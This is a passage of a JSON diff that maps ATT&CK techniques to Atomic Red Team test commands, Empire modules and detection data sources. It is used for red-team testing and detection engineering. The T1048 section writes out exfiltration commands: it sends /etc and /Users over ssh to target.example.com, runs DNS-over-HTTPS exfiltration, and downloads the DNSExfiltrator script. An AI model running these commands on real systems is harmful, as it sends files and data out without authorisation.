This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1048", + "command_list": [ + "ssh target.example.com \"(cd /etc && tar -zcvf - *)\" > ./etc.tar.gz\n", + "tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh atomic@#{domain} 'cat > /Users.tar.gz.enc'\n", + "tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'\n", + "tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'\n", + "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p atomic -doh #{doh} -t #{time} #{encoding}\n", + "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d target.example.com -p #{password} -doh #{doh} -t #{time} #{encoding}\n", + "Import-Module $env:Temp\\dnsexfil.ps1\nInvoke-DNSExfiltrator -i $env:Temp\\dnsexfil.ps1 -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}\n", + "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p #{password} -doh google -t #{time} #{encoding}\n", + null, + "powershell/exfiltration/exfil_dropbox", + "exfiltration/Invoke_ExfilDataToGitHub" + ], + "commands": [ + { + "command": "ssh target.example.com \"(cd /etc && tar -zcvf - *)\" > ./etc.tar.gz\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - 
Exfiltration Over Alternative Protocol" + }, + { + "command": "tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh atomic@#{domain} 'cat > /Users.tar.gz.enc'\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p atomic -doh #{doh} -t #{time} #{encoding}\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d target.example.com -p #{password} -doh #{doh} -t #{time} #{encoding}\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "Import-Module $env:Temp\\dnsexfil.ps1\nInvoke-DNSExfiltrator -i $env:Temp\\dnsexfil.ps1 -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p #{password} -doh google -t #{time} #{encoding}\n", + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": null, + "source": "atomics/T1048/T1048.yaml", + "name": "Atomic Red 
Team Test - Exfiltration Over Alternative Protocol" + }, + { + "command": "powershell/exfiltration/exfil_dropbox", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "exfiltration/Invoke_ExfilDataToGitHub", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1048", + "display_name": "Exfiltration Over Alternative Protocol", + "atomic_tests": [ + { + "name": "Exfiltration Over Alternative Protocol - SSH", + "auto_generated_guid": "f6786cc8-beda-4915-a4d6-ac2f193bb988", + "description": "Input a domain and test Exfiltration over SSH\n\nRemote to Local\n\nUpon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "domain": { + "description": "target SSH domain", + "type": "Url", + "default": "target.example.com" + } + }, + "executor": { + "command": "ssh #{domain} \"(cd /etc && tar -zcvf - *)\" > ./etc.tar.gz\n", + "name": "sh" + } + }, + { + "name": "Exfiltration Over Alternative Protocol - SSH", + "auto_generated_guid": "7c3cb337-35ae-4d06-bf03-3032ed2ec268", + "description": "Input a domain and test Exfiltration over SSH\n\nLocal to Remote\n\nUpon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "user_name": { + "description": "username for domain", + "type": "String", + "default": "atomic" + }, + "password": { + "description": "password for user", + "type": "String", + "default": "atomic" + }, + "domain": { + "description": "target SSH domain", + "type": "Url", + "default": "target.example.com" + } + }, + 
"executor": { + "command": "tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'\n", + "name": "sh" + } + }, + { + "name": "DNSExfiltration (doh)", + "auto_generated_guid": "c943d285-ada3-45ca-b3aa-7cd6500c6a48", + "description": "DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.\n!!! Test will fail without a domain under your control with A record and NS record !!! \nSee this github page for more details - https://github.com/Arno0x/DNSExfiltrator\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "password": { + "description": "Password used to encrypt the data to be exfiltrated", + "type": "String", + "default": "atomic" + }, + "domain": { + "description": "The domain name to use for DNS requests", + "type": "String", + "default": "target.example.com" + }, + "ps_module": { + "description": "DNSExfiltrator powershell ps_module", + "type": "Path", + "default": "$env:Temp\\dnsexfil.ps1" + }, + "doh": { + "description": "Google or CloudFlare DoH (DNS over HTTP) server", + "type": "String", + "default": "google" + }, + "time": { + "description": "The time in milliseconds to wait between each DNS request", + "type": "String", + "default": 500 + }, + "encoding": { + "description": "Set to '-b32' to use base32 encoding of data. 
Might be required by some DNS resolvers.", + "type": "String", + "default": null + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module})\n", + "prereq_command": "if (Test-Path #{ps_module}) {exit 0} else {exit 1}\n", + "get_prereq_command": "IWR \"https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1\" -OutFile #{ps_module}\n" + } + ], + "executor": { + "command": "Import-Module #{ps_module}\nInvoke-DNSExfiltrator -i #{ps_module} -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}\n", + "name": "powershell" + } + } + ] + }, + { + "Empire Module": "powershell/exfiltration/exfil_dropbox", + "ATT&CK Technique #1": "T1048", + "ATT&CK Technique #2": "T1071", + "Technique": "Exfiltration Over Alternative Protocol", + "Concatenate for Python Dictionary": "\"powershell/exfiltration/exfil_dropbox\": [\"T1048\",\"T1071\"]," + }, + { + "Empire Module": "exfiltration/Invoke_ExfilDataToGitHub", + "ATT&CK Technique #1": "T1048", + "ATT&CK Technique #2": "", + "Technique": "Exfiltration Over Alternative Protocol", + "Concatenate for Python Dictionary": "\"exfiltration/Invoke_ExfilDataToGitHub\": [\"T1048\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "User interface" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "User interface" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network 